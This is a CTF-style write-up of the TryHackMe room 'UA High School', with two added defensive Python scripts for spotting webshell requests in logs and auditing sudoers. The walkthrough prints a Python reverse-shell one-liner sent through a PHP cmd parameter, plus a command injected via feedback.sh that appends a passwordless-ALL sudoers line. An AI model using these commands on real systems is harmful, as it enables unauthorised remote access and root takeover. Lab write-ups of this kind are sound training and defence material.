UA High School - A TryHackMe Writeup
UA High School created by Fede1781
Start the machine and let it fully boot.
When we run nmap we see that we only have ports 22 and 80 open.

Since port 80 is open and served by Apache, there is most likely a website hosted there. Browsing to the IP gives us this page.

Viewing the page source shows that the CSS stylesheet is stored in the /assets folder. Running gobuster against / and against /assets (with -x php,html so it also reports files with those extensions) reveals a PHP file in /assets.

The PHP file does not load anything by itself; however, I wonder if we can exploit it somehow.
Appending ?cmd=ls to the URL returns some output:

Base64-decoding that output shows a listing of the assets directory.

So we do have some form of access via the LFI exploit. Navigating around, we find a user as well as the user.txt file, but we do not have permission to read it because we are still running as the www-data user. We need to find another way to gain access.
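From the defender's side, the request pattern used above (a query parameter such as cmd= sent to a PHP file, with the command output coming back base64-encoded) is easy to spot in the web server's access log. The script below is an added example and not part of the original writeup or the room: it parses Apache combined-format log lines, percent-decodes the query string, and reports every request that sends a suspicious parameter name to a .php file. The log lines, the IP addresses and the file name /assets/example.php are all constructed placeholders (the room's PHP file is not named in the writeup), and the set of parameter names beyond cmd is an assumption that generalises the single case on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Query-parameter names commonly used by PHP webshells. "cmd" is the one
# seen in this room; the others are an assumption that broadens the rule.
SUSPICIOUS_PARAMS = {"cmd", "command", "exec", "system"}

# Apache "combined" log format:
# host ident user [time] "method target protocol" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not captured from the room). The file name
# /assets/example.php is a placeholder.
SAMPLE_LOG = """\
10.10.14.3 - - [12/Mar/2024:09:15:01 +0000] "GET / HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.10.14.3 - - [12/Mar/2024:09:15:20 +0000] "GET /assets/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.10.14.3 - - [12/Mar/2024:09:16:05 +0000] "GET /assets/example.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.3 - - [12/Mar/2024:09:16:40 +0000] "GET /assets/example.php?cmd=ls HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.10.14.3 - - [12/Mar/2024:09:17:02 +0000] "GET /assets/example.php?cmd=whoami HTTP/1.1" 200 24 "-" "curl/8.4.0"
10.10.14.9 - - [12/Mar/2024:09:18:00 +0000] "GET /search.php?cmd=%2Fbin%2Fid HTTP/1.1" 404 196 "-" "curl/8.4.0"
"""


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_webshell_requests(log_text, params=SUSPICIOUS_PARAMS):
    """Return one finding per request that passes a suspicious parameter to a .php target.

    parse_qs percent-decodes the values, so the reported value is the command
    as the server would have seen it (e.g. %2Fbin%2Fid -> /bin/id).
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if not parts.path.lower().endswith(".php"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        for name in sorted(set(query) & params):
            findings.append({
                "host": rec["host"],
                "time": rec["time"],
                "path": parts.path,
                "param": name,
                "value": query[name][0],
                "status": int(rec["status"]),
            })
    return findings


if __name__ == "__main__":
    for f in find_webshell_requests(SAMPLE_LOG):
        print(f"{f['time']} {f['host']} {f['path']} {f['param']}={f['value']!r} ({f['status']})")
```

Note that the 404 in the last sample line is still reported: a probe for a webshell that is not there is worth seeing just as much as a hit, and the status code lets the analyst tell the two apart.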
We can get a reverse shell through Python by going to revshells.com and selecting Python3 #2. Make sure the IP and port are correct, start a netcat listener on your machine (nc -lvnp 4444), and then paste this code into the php?cmd= parameter:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP-ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
Once you hit enter, your nc listener should receive the connection from the target.

We are still the www-data user though, so we are not able to view user.txt.
Poking around the system, we find the user deku, but we also find a Hidden-Content folder as well as a oneforall.jpg file in the assets/images folder. The Hidden-Content folder gives us a passphrase file, but this password is not accepted when trying to SSH in as the deku user.
Back to the oneforall.jpg. When running file on it, it is reported as a data file rather than a JPEG. This tells us that something was altered in it. I downloaded the file to my local machine and edited the magic numbers back to the correct JPEG values using hexeditor.

Now when running file on it, it is reported as a proper JPEG file and we can actually open and view the picture.
Viewing the picture doesn't give us anything, but we still have that passphrase, so let's see if there is anything hidden in it with steghide.

It gives us a creds.txt file containing the user:pass to SSH in as deku. Now that we are in as deku, we can view the user.txt file.
Now if we run sudo -l as deku, we can see that anyone can run a feedback.sh script

After running the feedback form a few times, I tried to see whether we could run a command through it to add deku to the sudoers file.
deku ALL =NOPASSWD: ALL >> /etc/sudoers
After running this and checking sudo -l again, we see that the entry was added successfully. Running sudo /bin/bash now gives us root, and we can navigate to the root folder to view the root.txt file.
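Both halves of this privilege escalation leave a trace in /etc/sudoers: the rule that lets any account run a shell script as root without a password, and the deku ALL=NOPASSWD: ALL line that the injected command appended. The script below is an added example, not part of the writeup or the room: it parses sudoers user specifications (user, host, optional runas, tags and a comma-separated command list, with tags carrying over to later commands as sudo does) and flags the patterns seen here, namely passwordless ALL, a rule whose user is ALL, and a rule whose command is a shell script. The sample sudoers text is constructed, and /opt/placeholder/feedback.sh is a placeholder path since the writeup does not give the script's location.

```python
import re

# user host=(runas) [TAG:] cmd, cmd ...
USERSPEC_RE = re.compile(
    r"^(?P<user>[^\s=]+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(
    r"^(?:(?:NO)?PASSWD|(?:NO)?EXEC|(?:NO)?SETENV|(?:NO)?LOG_INPUT|(?:NO)?LOG_OUTPUT):\s*"
)

# Constructed sudoers content (not the room's file). The feedback.sh path is
# a placeholder; the last line mirrors the entry appended during the escalation.
SAMPLE_SUDOERS = """\
Defaults        env_reset
# User privilege specification
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
ALL ALL=(root) NOPASSWD: /opt/placeholder/feedback.sh
deku ALL =NOPASSWD: ALL
"""


def parse_sudoers(text):
    """Return one entry per (rule, command) pair; Defaults and comments are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # also drops legacy #include lines
        if not line or line.startswith("Defaults"):
            continue
        m = USERSPEC_RE.match(line)
        if not m:
            continue
        tags = set()  # sudo applies a tag to every following command in the list
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            while True:
                t = TAG_RE.match(cmd)
                if not t:
                    break
                tags.add(t.group(0).strip().rstrip(":"))
                cmd = cmd[t.end():]
            entries.append({
                "user": m["user"],
                "host": m["host"],
                "runas": m["runas"] or "root",
                "tags": set(tags),
                "cmd": cmd,
            })
    return entries


def audit(entries):
    """Flag the sudoers patterns that made this room's escalation possible."""
    findings = []
    for e in entries:
        if e["cmd"] == "ALL" and "NOPASSWD" in e["tags"]:
            findings.append({"severity": "HIGH", "user": e["user"], "cmd": e["cmd"],
                             "reason": "any command as %s without a password" % e["runas"]})
        if e["user"] == "ALL":
            findings.append({"severity": "HIGH", "user": e["user"], "cmd": e["cmd"],
                             "reason": "rule applies to every account on the host"})
        if e["cmd"].endswith(".sh"):
            findings.append({"severity": "MEDIUM", "user": e["user"], "cmd": e["cmd"],
                             "reason": "shell script run as %s; review it for unquoted or eval'd input" % e["runas"]})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"[{f['severity']}] {f['user']}: {f['cmd']} - {f['reason']}")
```

Run against the real file with sudo cat /etc/sudoers (and the drop-ins under /etc/sudoers.d) on a host you administer; a freshly appended NOPASSWD: ALL line for a low-privilege account is the kind of change that also deserves a file-integrity alert, since the legitimate path for editing sudoers is visudo.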